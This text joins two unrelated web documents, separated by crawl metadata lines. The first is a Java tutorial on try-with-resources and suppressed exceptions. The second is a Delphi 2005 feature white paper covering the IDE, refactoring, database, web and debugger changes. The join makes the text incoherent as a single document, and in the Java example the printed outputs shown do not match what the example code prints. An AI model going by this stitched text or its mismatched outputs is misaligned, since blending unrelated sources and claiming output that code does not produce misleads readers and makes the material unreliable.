The try-with-resources statement automatically closes all the resources at the end of the statement. A resource is an object to be closed at the end of the program. Its syntax is: try (resource declaration) { // use of the resource } catch (ExceptionType e1) { // catch block } As seen from the above syntax, we declare the try-with-resources statement by, - declaring and instantiating the resource within the tryclause. - specifying and handling all exceptions that might be thrown while closing the resource. Note: The try-with-resources statement closes all the resources that implement the AutoCloseable interface. Let us take an example that implements the try-with-resources statement. Example 1: try-with-resources import java.io.*; class Main { public static void main(String[] args) { String line; try(BufferedReader br = new BufferedReader(new FileReader("test.txt"))) { while ((line = br.readLine()) != null) { System.out.println("Line =>"+line); } } catch (IOException e) { System.out.println("IOException in try block =>" + e.getMessage()); } } } Output if the test.txt file is not found. IOException in try-with-resources block =>test.txt (No such file or directory) Output if the test.txt file is found. Entering try-with-resources block Line =>test line In this example, we use an instance of BufferedReader to read data from the test.txt file. Declaring and instantiating the BufferedReader inside the try-with-resources statement ensures that its instance is closed regardless of whether the try statement completes normally or throws an exception. If an exception occurs, it can be handled using the exception handling blocks or the throws keyword. Suppressed Exceptions In the above example, exceptions can be thrown from the try-with-resources statement when: - The file test.txtis not found. - Closing the BufferedReaderobject. An exception can also be thrown from the try block as a file read can fail for many reasons at any time. If exceptions are thrown from both the try block and the try-with-resources statement, exception from the try block is thrown and exception from the try-with-resources statement is suppressed. Retrieving Suppressed Exceptions In Java 7 and later, the suppressed exceptions can be retrieved by calling the Throwable.getSuppressed() method from the exception thrown by the try block. This method returns an array of all suppressed exceptions. We get the suppressed exceptions in the catch block. catch(IOException e) { System.out.println("Thrown exception=>" + e.getMessage()); Throwable[] suppressedExceptions = e.getSuppressed(); for (int i=0; i<suppressedExceptions.length; i++) { System.out.println("Suppressed exception=>" + suppressedExceptions[i]); } } Advantages of using try-with-resources Here are the advantages of using try-with-resources: 1. finally block not required to close the resource Before Java 7 introduced this feature, we had to use the finally block to ensure that the resource is closed to avoid resource leaks. Here's a program that is similar to Example 1. However, in this program, we have used finally block to close resources. Example 2: Close resource using finally block import java.io.*; class Main { public static void main(String[] args) { BufferedReader br = null; String line; try { System.out.println("Entering try block"); br = new BufferedReader(new FileReader("test.txt")); while ((line = br.readLine()) != null) { System.out.println("Line =>"+line); } } catch (IOException e) { System.out.println("IOException in try block =>" + e.getMessage()); } finally { System.out.println("Entering finally block"); try { if (br != null) { br.close(); } } catch (IOException e) { System.out.println("IOException in finally block =>"+e.getMessage()); } } } } Output Entering try block Line =>line from test.txt file Entering finally block As we can see from the above example, the use of finally block to clean up resources makes the code more complex. Notice the try...catch block in the finally block as well? This is because an IOException can also occur while closing the BufferedReader instance inside this finally block so it is also caught and handled. The try-with-resources statement does automatic resource management. We need not explicitly close the resources as JVM automatically closes them. This makes the code more readable and easier to write. 2. try-with-resources with multiple resources We can declare more than one resource in the try-with-resources statement by separating them with a semicolon ; Example 3: try with multiple resources import java.io.*; import java.util.*; class Main { public static void main(String[] args) throws IOException{ try (Scanner scanner = new Scanner(new File("testRead.txt")); PrintWriter writer = new PrintWriter(new File("testWrite.txt"))) { while (scanner.hasNext()) { writer.print(scanner.nextLine()); } } } } If this program executes without generating any exceptions, Scanner object reads a line from the testRead.txt file and writes it in a new testWrite.txt file. When multiple declarations are made, the try-with-resources statement closes these resources in reverse order. In this example, the PrintWriter object is closed first and then the Scanner object is closed. Java 9 try-with-resources enhancement In Java 7, there is a restriction to the try-with-resources statement. The resource needs to be declared locally within its block. try (Scanner scanner = new Scanner(new File("testRead.txt"))) { // code } If we declared the resource outside the block in Java 7, it would have generated an error message. Scanner scanner = new Scanner(new File("testRead.txt")); try (scanner) { // code } To deal with this error, Java 9 improved the try-with-resources statement so that the reference of the resource can be used even if it is not declared locally. The above code will now execute without any compilation error.
https://www.programiz.com/java-programming/try-with-resources
CC-MAIN-2021-39
refinedweb
906
51.65
By: Anders Ohlsson Abstract: A Technical White Paper By Bob Swart on all that's new in Delphi 2005 Whats New in Delphi 2005? by Bob Swart () Bob Swart Training & Consultancy (eBob42) <![if !supportEmptyParas]> <![endif]> <![if !vml]><![endif]> Borland Delphi 2005 Splash Screen Borland Delphi 2005 is the latest version of Borland Delphi, offering Rapid Application Development for the Microsoft Windows Operating System and the Microsoft .NET Framework version 1.1. with both the Delphi language (for Win32 and .NET 1.1) and C# (for .NET 1.1 only). Delphi 2005 can be seen as having three different personalities: a Win32 personality using the Delphi language (where Delphi 2005 is the successor of Borland Delphi 7), and two .NET personalities: one using Delphi as language (the successor of Borland Delphi 8 for the Microsoft .NET Framework), and the other using C# as language. With respect to the latter personality, Delphi 2005 is the upgrade from Borland C#Builder 1.0. As a result, Delphi 2005 is the next step for current Borland Delphi 3 through 8 and Borland C#Builder developers for rapid application development (RAD) on Win32 as well as the .NET Framework. [Feel free to suggest others/changes!] - Support for three different personalities: Delphi for Win32, Delphi for .NET and C# all from within one development (and debugging) environment. - Easy migration of Win32 applications to .NET within the same development environment. - Support for the Delphi language with several enhancements like multi-unit namespaces, for ... in ... do loops, inline functions and other code optimisations. - Support for WinForms, ASP.NET Web Forms as well as Borland's own VCL framework on .NET, and VCL for Win32 with visual designers to build applications the RAD way. - Support for heterogeneous database access (using any ADO.NET Data Adapter not just BdpDataAdapter) as well as multi-tier database applications with new DataSync, DataHub, RemoteServer and RemoteConnection components. - Support for refactoring to restructure your source code, increasing the maintainability and chances of successful reuse. - Support for unit testing with DUnit and NUnit, using the extreme unit-test framework in Delphi for Win32, Delphi for .NET and C# projects to increase the quality of your code. - Support for Enterprise Core Objects II - a UML compliant Object Model Framework and Object Persistence, with support for databases through the Borland Data Provider, and now also available for ASP.NET. - Support for ASP.NET with DB Web controls to facilitate the design, implementation and deployment of powerful data-driven Web applications. - Support for version and team development, with a special backup and history view of your project files, plus optional integration with StarTeam. - Support for integration with J2EE Enterprise JavaBeans (EJB) or CORBA servers with the Janeva solution for Delphi for .NET and C# applications. This white paper will discuss the major enhancements in Borland Delphi 2005, grouped by area. First, the Integrated Development Environment (IDE) enhancements are covered, followed by refactoring, unit testing with DUnit and NUnit, enhancements in the database and Web areas, ALM support, and finally Delphi compiler, language and debugging enhancements. The Delphi 2005 Integrated Development Environment (IDE) is significantly extended and enhanced in nearly every area. The Welcome Page is redesigned, showing not only the recent projects, but also the recent news from Borland Developer Network and RSS News feeds (depending on the availability of an internet connection). Delphi 2005 supports multiple personalities, featuring Delphi for Win32, Delphi for .NET and C# projects. As a little helpful hint, a personality icon in the IDE toolbar displays the active personality (Delphi for Win32 <![if !vml]><![endif]>, Delphi for .NET <![if !vml]><![endif]>, or C# <![if !vml]><![endif]>). The Delphi 2005 Project Manager now displays the directory structure of the entire project (and for ASP.NET projects even offers the ability to create and manage subdirectories in your project directory), which offers better insight into where files are placed and which files to deploy. Within a Project Group, we can add projects for different targets (and personalities), and switch from one project to another - and hence one personality to another, instantly. The Project Manager and the Object Inspector now work together, as you can select a file in the Project Manager, which results in the Object Inspector showing information like the file name and full path, plus file specific properties like the culture, name and version number of assemblies, or the Copy Local option. Most of these properties will be read-only (displayed in grey font), while some can be used to actually change for example the filename or Copy Local status. The Project Manager is also StarTeam aware and offers context sensitive commands within the Project Manager for managing projects stored in StarTeam. The Borland Delphi 2005 IDE transparently maintains multilevel backups and a history of your project source files in a hidden __history directory of your project directory. This replaces the old .~ files. The __history directory can contain multiple versions of your project (by default the latest 10 versions are maintained), and can be used as a local version control repository. The History View is used to examine the current and backup versions of your project files, and even view at insightful (and intelligent) difference views between two different versions, showing exactly what you added, removed or modified in your source code. Apart from just looking at the differences, you can also revert changes, going back in time to backup versions of your files. The History View also supports StarTeam for even more complete team view of your projects history (see ALM section). Borland Delphi 2005 now offers a choice of free-floating VCL designers, just like Borland Delphi 7 and prior (as opposed to the fixed form designers of Borland Delphi 8). By default, the Embedded Designer is used, but you can uncheck the Embedded Designer option in the VCL Designer node of the Delphi Options. Delphi 2005 Tools Options dialog This not only allows you to view your form designer and source code at the same time, it also allows you to simultaneously view multiple forms and data modules at design-time. Borland Delphi 2005 offers a new Sync Edit feature, which allows you to edit multiple occurrences of symbols in a section of selected code (allowing you to rename them all at once, for example). Note that the Sync Edit feature is lexical, and is therefore best used for small portions of source code (like a routine or method implementation). For renaming identifiers within larger portions of source code, it's recommended to use the refactoring features, which uses a syntactic and semantic engine instead. Delphi 2005 SyncEdit in action The Borland Delphi 2005 IDE offers a new feature called Error Insight, which highlights syntax errors in Delphi, C# or HTML code as you type. Error Insight will display a red squiggle under the syntax error, including a message with more information about the error. This feature helps you to fix syntax errors in your source code before you even have to start to compile your projects. In addition to undeclared identifiers and misspelled keywords and reserved words, Error Insight also identifies symbols that are not in scope (like a type from a namespace which has to be added to the uses or using clause before it can be used). The Borland Delphi 2005 IDE has an enhanced way to find references powered by the new refactoring engine, and use the results to navigate through your source code. You can find local references (within a single source file) of symbols (like fields, methods, properties, variables, etc.), or you can find and examine all references, which will go through all source files of your project. The references are presented in a treeview, and each node can be used to quickly navigate through your project. If you double-click on a node, the code editor will bring you to the actual line in the source code. This is a very convenient and quick way to access your project files. Delphi 2005 Find References treeview result Find Reference Results are always available via the Views menu, and the treeview can even contain multiple results at once, showing the result of previous searches. The new Help Insight offers help on symbols like classes, properties, methods or events as you type. Help Insight can show up at two different occasions: either as a tooltip popup, or in combination with a Code Insight popup. A Help Insight ToolTip window pops-up when moving the mouse in the code editor over a symbol. It produces a tooltip window with information about the specific symbol inside, including relevant links to additional information from the on-line help. You can also get the Help Insight window in combination with a Code Insight window, in which case the Help Insight gives more information about the currently selected code insight item. This can be very helpful if you need to select a property, method or event but need to know which one should be selected for a specific purpose you have in mind. Delphi 2005 Help Insight on Code Insight Help Insights are also generated from your own classes and methods as well. The upper left corner of the Delphi 2005 IDE contains the Structure View. This window is used in different situations. It can show the hierarchy of source code in the Code Editor, HTML controls in the HTML Designer, as well as the hierarchy of visual controls in the VCL Forms Designer. For a source code structure, the Structure View will also dynamically display syntax errors in the top node called 'Errors', which lists all errors found by Error Insight. Delphi 2005 Structure View When viewing the structure of visual components, you can double-click on items in the Structure View to be taken to the specific component in the Forms Designer. When viewing the structure of source code of HTML, you can double-click on items in the Structure View to be taken to the corresponding declaration in the code editor. When performing searches, the results are now displayed in a convenient treeview, with the hits grouped by filename. You can browse through the files, and open the nodes to view the individual hits inside the specific file. The search mechanism of the Tool Palette has been enhanced so that you can now enter the first letter(s) of a component, and immediately only the categories and components that start with this letter(s) are filtered for you, highlighting the letter(s) you typed and filtering further as you type. Pressing enter will place the current selected component on the form in the designer. In addition to showing components (when in design view) or code snippets (when the code editor has the focus), the Tool Palette has been enhanced to also show the wizards from the Object Repository to start new projects, with the Object Repository categories translated into Tool Palette categories. This allows you to easily create new files, projects, and objects from the wizard with a quick hot key. Refactoring is the process of reshaping existing source code by adding structure to it, without changing the behaviour and output of your code, thereby making it easier for actual reuse and maintenance. Borland Delphi 2005 refactoring support includes a number of very helpful new features, from extracting methods to declaring new variables or fields, extracting resource strings, renaming identifiers and refining the namespace and uses clauses. Delphi 2005 Refactor Menu While the Sync Edit feature allows you to lexically rename identifiers in a selected section of source code, for larger sections of source code Delphi 2005 refactoring offers the option to rename symbols (like fields, methods, properties, variables, etc.) using Refactor - Rename. The refactoring dialog will even allow you to view all references before refactoring (so you can verify all places where the rename will be made). This feature adds real refactoring intelligence to the standard search and replace functionality, by not just renaming any symbol within the current scope, but only those that are indeed the same as the selected symbol .For example, if you have both a method X and a local variable X, and you want to rename only the method X, Refactor - Rename ensures the local variable X will be left alone, as it recognizes its not the same as the method X). While writing source code, it may happen that you use variables before you declare them. The Delphi 2005 refactoring allows you to automatically declare these variables using Refactor - Declare Variable, offering you a dialog to enter the specifics, and adding the variable declaration to the current scope. This option is only available for variables that are not yet declared, of course, but will allow you to focus on the code and algorithm logic, without having to manually navigate to the beginning of the scope to add a variable declaration. Declare variable works well with Error insights, when an undeclared variable is highlighted by error insights simply right click on the variable to declare. Similar to declaring undeclared variables, Delphi 2005 Refactoring offers the ability to declare class fields using Refactor - Declare Field. If the field conflicts with an existing field in the same scope, then the Refactoring dialog will allow you to resolve the conflict. This feature greatly reduces time to extend your classes with fields while writing your source code, without forcing you to return to your class declaration and add the field definition manually. Delphi 2005 refactoring allows you to select a portion of source code (which might be a portion that is repeated in several places, or could be used in other places),. There's nothing harder to localise than a portion of source code that uses hard coded quoted strings inside. Delphi 2005 refactoring now allows you to extract these quoted strings and replace them with resource strings (adding the resource string declarations to the implementation section of your code). Sometimes you use classes, methods, fields or types that are defined in another namespace. In order to add the corresponding namespace to the uses (for Borland Delphi) or using (for C#) clause, Delphi 2005 refactoring offers the ability to automatically import the required namespace for a selected identifier, using Refactor - Import Namespace. This feature will save you a lot of time looking up namespaces otherwise. Unit testing is a methodology of adding tests to your code in such a way, that the tests themselves can be run and verified by a test project, reporting the continued validity of your source code. For best results, unit testing should be applied right from the start, adding tests to your classes as you write the actual code itself (some people even believe you should write your test first, and then the actual code to test). Unit testing can also play a very helpful role when applying refactoring, if only to verify that the resulting refactored source code is still behaving the same - correct - way. A unit testing framework is often called an Xtreme testing framework, related to Xtreme Programming. Delphi 2005 includes both DUnit (for Win32 and .NET) and NUnit. DUnit () is the Delphi version of the unit-testing framework (for both Win32 and .NET), while NUnit () is a .NET language neutral unit-testing framework which can be used with both C# and Delphi for .NET. Both DUnit and NUnit are included and integrated with Delphi 2005. For every project, you can add an associated test project to the project group using the New Test Project Wizard. For Delphi Win32 projects, this will use the DUnit test framework. For Delphi for .NET projects, you can select either the .NET version of the DUnit test framework, or the NUnit test framework, and finally for C# projects this will use the NUnit test framework. Both the DUnit (for .NET or Win32) and NUnit test frameworks offer a choice of a GUI or console test runner to execute and display the test results. Within a test project, you can use the New Test Case Wizard to add specific test cases for units that belong to the project. For each unit, you can select the classes and methods of these classes that will be added to the test. An example test skeleton can also be generated so you can later add your own tests manually. Once a test project with test cases is maintained, there is a separate test-runner environment that you can start from the Delphi 2005 IDE to run the tests, and view the results. You get feedback on all errors and failures (if any), the tests that were not run, and the output written to the console. Unit testing helps to increase the quality, maintainability and reuse capabilities of your code, and having unit testing integrated into the Delphi 2005 IDE makes it even easier to implement. Borland Delphi 2005 offers ADO.NET-specific as well as VCL and VCL for .NET database support. A number of database enhancements were implemented in Delphi 2005, particularly in the ADO.NET technology, but also to BDE, dbExpress and the availability of dbGO for ADO on .NET. There are a number of Borland Data Provider for ADO.NET improvements, including support for InterBase Boolean fields, Oracle packages, localized table name support, Schema Name list retrieval, and Sybase 12.5 support. This brings the list of certified BDP ADO.NET data provider drivers to the following:, Microsoft MSDE 2000, Microsoft Access 2000, and Sybase 12.5. There are significant database related ADO.NET designer enhancements in Delphi 2005. There is new Stored Procedure Testing support, where you can specify the stored procedure to test, including the input parameters, and then actually run the stored procedure and view output parameter values (if any). Delphi 2005 Stored Procedure dialog testing SUB_TOT_BUDGET A special table mapping feature helps you to specify the table mapping for a BdpDataAdapter, where you can specify the mapping between columns of a DataTable and an in-memory DataSet with more descriptive column names. You can also add or remove columns for the in-memory dataset. The Object Inspector now offers a Connection String Editor for the SQLConnection component, allowing specifying the connection string for an ADO.NET provider. New ADO.NET components called RemoteServer and RemoteConnection offer RAD support for building multi-tier applications (using .NET remoting infrastructure). Two other new ADO.NET components, called DataHub and DataSync, offer support for aggregating heterogeneous databases into single datasets. The four components can be combined, resulting in distributed applications using multiple different ADO.NET data providers. In this architecture, the DataHub and RemoteConnection are part of the thin-client tier, while the RemoteServer and DataSync components are part of the server tier, connected to the data providers. The AutoUpdate method of the BdpDataAdapter is also enhanced and is now capable of resolving multi-table updates and better error handling. A special BDP component called bdpCopyTable supports data migration, and enables you to copy tables including data from one BDP supported database to another. Typed Datasets now produce code that compile to standalone .NET assemblies. Typed Datasets also support datasets from Web Services. The Project Manager offers context menus to start the Relation and Table Collection Editors for a dataset, so you can modify a typed dataset more conveniently. The Database Explorer, for BDP data providers, has been enhanced in several areas as well. It now supports easy data migration from one BDP data provider to another, with a feature that allows you to copy a table from one BDP data provider, and pasting the table in another BDP data provider. This will copy and reconstruct the table meta data as well as the data to the target database even if the source and target databases are of completely different vendors; from Oracle to MSSQL for example. This corresponds to the behaviour of the BdpCopyTable component. The Data Explorer offers additional meta data capabilities, and allows you to view and modify the database schema directly from the Data Explorer. You can create new tables, alter tables or drop existing tables. It's also possible to drag a stored procedure directly from the Data Explorer to a Forms Designer, which will create an instance of the BdpConnection (when needed) and BdpCommand, automatically assigns the stored procedure to the BdpCommand, and populate the parameters for the stored procedure. Delphi 2005 contains database support for VCL and VCL for .NET applications in the form of BDE, dbExpress and dbGo for ADO as well as InterBase Express (IBX). These data access technologies exist for both VCL and VCL for .NET projects, and offer a seamless migration path from Win32 to .NET. When building VCL for .NET applications, Delphi 2005 now supports dbGO for ADO for both Win32 and .NET, which also makes migration of Win32 dbGO for ADO applications to the .NET Framework possible. The dbGO for ADO components require MDAC 2.8. The dbExpress components have been extended by a TSimpleDataSet for .NET, better performance for TSQLStoredProc, and meta data improvements. The following certified drivers are available for dbExpress:, IBM Informix 9.x, SQL Anywhere 9 (should also work with ASA 8), MySQL 4.0.x, and Sybase 12.5. The Borland Database Engine (BDE) - for VCL or VCL for .NET applications - supports local dBASE and Paradox tables. The BDE for .NET has been enhanced with the ability to dynamically load the BDE DLLs, without the need to specify the path. It also offers increased BLOB performance, and includes some of the BDE components for .NET that were not available before, namely TUpdateSQL, TNestedTable, and TStoredProc. InterBase Express (IBX) offers direct connectivity to InterBase for VCL as well as VCL for .NET applications. Delphi 2005 contains a number of Web development enhancements both for VCL (for Win32 and .NET) and ASP.NET. Delphi 2005 now contains a special Web Deployment Manager, which can be used for ASP.NET Web Form and ASP.NET Web Service projects, as well as IntraWeb for both VCL and VCL for .NET. The Web Deployment Manager can be used to connect to either a directory (local or on a network) or an FTP target. The Deployment View will show both the local files (from the project directory) and the remote files (from the directory or FTP location), and gives you the option to deploy the entire project in one click. You can also compare files, remove files, etc. Deployment settings are stored with your project, so you can always redeploy with your specific settings at a later time. This is very powerful and ideal for fast deployment. Apart from supporting ASP.NET and IntraWeb projects, the Web Deployment Manager can be extended to support other project types as well. The DB Web controls can be used to build powerful data-driven ASP.NET Web Form applications. Delphi 2005 introduces a number of new DB Web controls, including DBWebAggregateControl, DBWebSound, DBWebVideo, and DBWebNavigationExtender. The DBWebAggregateControl can be used to display aggregate values of columns from a dataset. Available aggregate operations include Avg, Count, Min, Max, and Sum. The DBWebSound and DBWebVideo controls are included to support audio and video formats, connecting through a DBWebDataSource to fields from a dataset or from a URL. The DBWebNavigationExtender is especially helpful in situations where you want to allow updates to be sent to the database, but without using the DBWebNavigation control (specifically the ApplyToServer button of this control). The DBWebNavigationExtender is a non-visual control that can be used to extend standard Web Controls - like a Button - with the functionality of the DBWebNavigator buttons. So you can build your own navigation controls. Apart from these four new DB Web controls, the DbWebDataSource has been extended with a new OnAutoApplyRequest event, and now supports cascading updates and deletes. Apart from the DbWebDataSource, DB Web controls can now also connect to an EcoDataSource - which hooks to an ECO II ExpressionHandler. Delphi 2005 also offers a New DB Web Control wizard that enables you to write your own DB Web compatible ASP.NET control (which can also connect to a DbWebDataSource or EcoDataSource). The DB Web controls now support XML Caching, which is a powerful feature that can be used as a server-side briefcase for web clients. Delphi 2005 DB Web controls now have the ability to control the navigation order, using a Navigation API with RegisterNextControl, RegisterPreviousControl, RegisterFirstControl, RegisterLastControl, RegisterInsertControl, RegisterDeleteControl, RegisterUpdateControl, RegisterCancelControl, RegisterUndoControl, RegisterUndoAllControl, RegisterApplyControl, RegisterRefreshControl, and RegisterGoToControl. ASP.NET HTML controls can now be represented as controls in the code behind file, by using the Run AS Server Control option which adds the runat=server attribute to the scripting control, as well as a control declaration in the code-behind source file. Delphi 2005 now supports Template Editors for the DataGrid and DataList controls, enabling you to define and easily edit your own custom template columns. When using VCL (for Win32 or .NET) Delphi 2005 supports web applications with IntraWeb from AtoZedSoftware (). IntraWeb offers RAD WYSIWYG design for Web applications, in many aspects like ASP.NET, but also different in certain areas. The main advantage of IntraWeb is its support for transparent user and state management, which ASP.NET doesnt. IntraWeb Web applications are compatible with non-visual VCL components, like the data-access categories BDE, dbExpress, dbGo for ADO and InterBase Express (which means a migration path from Win32 to .NET) whereas ASP.NET applications use native .NET components with ADO.NET and BDP for data access capabilities. Borland C#Builder 1.0 and Borland Delphi 8 included the first version of Enterprise Core Objects (ECO), which is greatly enhanced for highly scalable enterprise application development in Delphi 2005. There are several enhancements available in Enterprise Core Objects II compared to the initial version. The most important ECO II enhancements can be summarized as follows - support for scalable, distributed applications - support for ASP.NET (both Web Forms and Web Services) - support for mapping from existing databases - overall ease-of-use enhancements to make life in the ECO space easier Most importantly, ECO II is now enterprise scalable. Where the first version was a client/server solution, ECO II supports both client/server and remote solutions. There are several possible architectures, out of the box, for building scalable ASP.NET or WinForms applications. Synchronizing multiple object caches i.e. EcoSpaces, either in the same process or in multiple separate processes, is managed by the new extended PersistenceMapper. The synchronizing persistence mapper can in it self be executing within the same process or, more likely, in a process at a server. Using Delphi 2005 we can now combine ECO II and ASP.NET, for use in both ASP.NET Web Forms and ASP.NET Web Services. The Borland DB Web controls can expose objects within an EcoSpace through binding to the new EcoDataSource component, which uses an OCL expression to provide a datasource, and can be used to produce visual data-aware ASP.NET Web Form applications. The same can be done with any regular native ASP.NET Web control. ECO components, such as the ExpressionHandler, provide a list of elements that can be used as a DataSet, and hence binds any ASP.NET components including DataList and DataGrid. Since requests in ASP.NET applications are stateless, we can maintain the EcoSpace state either in the session or at the application level. ECO II uses optimistic locking, and when a conflict occurs, conflict resolution is used to determine the correct actions. Specifically, when an Eco Space detects that a value in the actual database is different from the supposed "old value" in the EcoSpace, it registers a conflict in an internal list in the EcoSpace. The developer can call RetrieveChanges for any changes done by other EcoSpaces, and GetChanges for any unresolved conflicts that can then be resolved (usually interactively by the end user). Delphi 2005 ECO II ASP.NET Web Form at design-time With Enterprise Core Objects II in Delphi 2005 it's now possible to develop applications that use existing databases for persistence, through the new enhanced Object-Relational mapping which is driven by XML schema files. This powerful new feature can be used to reverse an existing MS SQL server, ORACLE or InterBase database, and create the mapping schema file as well as the UML model, with classes wrapping the database tables. Delphi 2005 and Northwind database imported in ECO II Model The EcoSpace Designer has a number of additional capabilities in Delphi 2005, including the ability to generate default mapping schema XML file, to convert an ECO I type database to ECO II format, and to reverse/wrap an existing database. The EcoSpace designer also has been enhanced with new tooltip hints that show a list of the usage tasks need to be done, for example for the PersistenceMapperBdp. Delphi 2005 ECO II design-time tooltip hints The tasks that are done will automatically be checked, so you always have an up-to-date overview of what's done and what steps remains to be done. In another example where tooltip hints are used: when you want to open a new ECO Package, the hints will show all classes defined in the selected ECO Package. Delphi 2005 can now produce several different ECO II projects. For the C# personality, we can create an ECO ASP.NET Web Application, an ECO ASP.NET Web Service, an ECO Package in DLL (so we can use the EcoSpace in another project that uses this DLL), and an ECO WinForms Application. For the Delphi for .NET personality, we can create an ECO ASP.NET Web Application, an ECO ASP.NET Web Service, and an ECO WinForms Application. Delphi 2005 integrates with tools from the Borland Application Lifecycle Management suite including CaliberRM, StarTeam, and Janeva. StarTeam offers support for source code version control, as well as requirements management, defect tracking, threaded discussion groups, and distributed collaboration. Delphi 2005 contains an integrated StarTeam client, available through the StarTeam menu as well as the Project Manager context-menu, which allow you to operate StarTeam from within the Delphi 2005 IDE. You can place projects into StarTeam, check in files, check out files, revert to older versions, lock and unlock files in the StarTeam repository, and more. Furthermore, the History Manager supports StarTeam so back ups can be accessed and compared or restored from either local backups or the StarTeam repository. Delphi 2005 contains Janeva support (in the Enterprise and Architect editions). Janeva can be used to connect a .NET client application (written in C# or Delphi for .NET) to a J2EE Enterprise JavaBean or CORBA Object. When Janeva is installed (as well as the Janeva IDE plug-in), you get two new menu options for the project node in the Project Manager, Add J2EE Reference... and Add CORBA Reference... to add the specific reference. The Add J2EE Reference... starts a dialog where you can select an EJB from a .jar file, while the Add CORBA Reference... starts a dialog where you need to select an .idl file that contains the interface definition of the CORBA object. After importing the .jar or .idl file, the result is a native object that can be used by the .NET client, and will go through the Janeva assemblies for a direct connection to the J2EE Enterprise JavaBean or the CORBA object, without the need for additional layers (like a Web Service or gateway software). Previous versions of the Janeva plug-in (for C#Builder) generated C# code, but the Janeva integration in Delphi 2005 generates assemblies that can be used with any .NET language. The Janeva plug-in wizard now automatically generates a corresponding app.config file with the required Janeva parameters for your Janeva client project. *Janeva requires a runtime license to deploy your application. This is available from your Borland sales representative. There are many enhancements to the Delphi compiler, language and debugger of Delphi 2005. Several performance enhancements have been implemented for the Delphi 2005 compiler, resulting in even faster compilation speeds. The compiler now also supports Unicode and UTF8 source code files, Unicode characters in identifiers and symbols. The Delphi language has been extended with a new for-loop syntax, a bit similar to the foreach construct. This powerful new language feature can be used to iterate through a set of values. Both the Win32 and .NET Delphi languages are extended with function inlining, which can result in faster performance. Instead of calling a routine, the code from the routine itself is expanded in place of the call (saving a call and return, as well as parameter management). This is especially beneficial for small routines, routines outside your unit scope, or routines with many parameters. For bigger routines, the trade-off between efficiency at the cost of bigger code size should be considered carefully before applying inline. We can either inline routines explicitly with the inline directive, or use an {$INLINE AUTO} compiler directive. The latter will leave it up to the compiler to select routines for inlining that are likely to improve your performance. Using {$INLINE ON} you specify that a set of routines will all be inlined from that point on. There are a number of exceptions regarding routines that cannot be inlined by the compiler. Although you can inline routines from different units in a package (assembly), you cannot inline routines across package boundaries for example. It's also not possible to inline virtual, dynamic or message methods, as well as methods of interfaces and dispinterfaces. The previous version of the Delphi for .NET compiler used a mapping of one unit per namespace (where the name of the unit would be the name of the namespace). This has been expanded in Delphi 2005, where a namespace can now be made up of several units. With a unit name of for example Comp.Group.MyUnit.pas, the left-hand side Comp.Group is the name of the namespace, and MyUnit.pas the local unit scope within the namespace. This allows us to write multiple units and make them all belong to a single namespace (ideal for ASP.NET custom controls, that can now get a single control prefix). As another consequence of this new namespace feature in Delphi 2005, it's now also possible to use Delphi 2005 in order to extend existing namespaces with our own functionality. For example the System.Web namespace can be extended with classes and types from a System.Web.MyUnit.pas unit. The namespace extension becomes part of any application or assembly that contains the System.Web.MyUnit.pas. The Delphi 2005 Win32 debugger now includes better support for Win32 stack frames that do not have debug information. Also included is a special dialog for handling exceptions when debugging within the IDE. When an exception is raised, a dialog will pop-up that offers you the chance to ignore this exception type, or inspect the exception object, including the option to actually Break or Continue. The Breakpoint List has been enhanced with inplace editing, which is most notably for the condition or the group, as well as the enabling of breakpoints which can now be done with checkboxes. This avoids dialogs and speeds up the configuration of our breakpoints. Delphi 2005 Breakpoint List with editable Condition field There is also a new toolbar in the Breakpoint window, which can be used to delete breakpoints, delete all, enable all at once, disable all, or edit the breakpoint properties. Delphi 2005 contains four new Delphi views. Where Borland Delphi 8 for .NET offered Debug views of Breakpoints, Call Stack, Watches, Threads and the Event Log, Delphi 2005 adds the FPU, Local Variables, CPU and Modules view. Delphi 2005 now also offers a module view, which displays the App Domains, and allows you to drill down into the details of the namespaces and assemblies loaded within that App Domain. You'll now be able to sort the items in the module view by name or base address. The CPU view shows the original source code, the IL (Intermediate Language) as well as native machine assembly and opcodes. Delphi 2005 CPU View with mixed Pascal, ILASM and machine code Using the Delphi 2005 IDE it's not only possible to load multiple projects using the Project Manager (in a Project Group), you can also run the Win32 and .NET debuggers side-by-side. Allowing you to run and debug both the Win32 and the .NET application from the same development environment. You can even run both debuggers at the same time, switching from project to project (and personality to personality) in the Project Manager. This white paper has covered the key new features in Delphi 2005, as well as enhancements to existing technology areas. As youve seen, the IDE has been enhanced with a new welcome page, support for multiple personalities, backup and file history support (with optional integration with StarTeam), floating VCL designers, Sync Edit, Error Insight, Help Insight, a Structure View, Find References, a better way to view search results, and Tool Palette Wizards that help you to start new applications even quicker. Refactoring is also one of the main new features in Delphi 2005, offering features from Rename Symbols, Declare Variable, Declare Field, Extract Method, and Extract Resource String to Import Namespace. Another great addition is support for unit testing with DUnit and NUnit, plus IDE integration with Test Project and Test Case wizards. At the database side, the BDP components have been extended with new drivers, a BdpCopyTable component, DataSync and DataHub components for heterogeneous database support, and RemoteServer plus RemoteConnection components for building multi-tier .NET database applications (using DataSync and DataHub, so even heterogeneous and multi-tier if you wish). For Web development, the ASP.NET debugging is enhanced, there are new dbWeb controls for aggregate values, audio, video and navigator action events, support for template editors for the DataGrid and DataList, and finally IntraWeb is included for Win32 as well as .NET Web applications. Enterprise Core Objects (now ECO II) has been enhanced with support for scalable, distributed applications, support for ASP.NET (both regular and dbWeb controls), and the ability to map an existing database in an ECO model. Delphi 2005 offers integration with Borland ALM tools including StarTeam and Janeva (for connectivity to J2EE and CORBA servers). Last but not least, the compiler and Delphi language have been enhanced with many new features like the new for..in..do loop, function inlining, multi-unit namespaces. And the debugger has been enhanced with a better breakpoint list, new debug views for .NET, and side-by-side debugging of Win32 and .NET projects. Whether your goal is to develop components or applications for the Microsoft Windows Operating System, or for the Microsoft .NET Framework version 1.1, Delphi 2005 offers extensive, high-productivity and high-quality support for modern Windows development. Download Delphi 10 now! Webinars on demand! More social media choices: Delphi on Google+ @RADTools on Twitter Server Response from: ETNASC02
http://edn.embarcadero.com/es/article/32778
CC-MAIN-2016-36
refinedweb
6,485
53.61
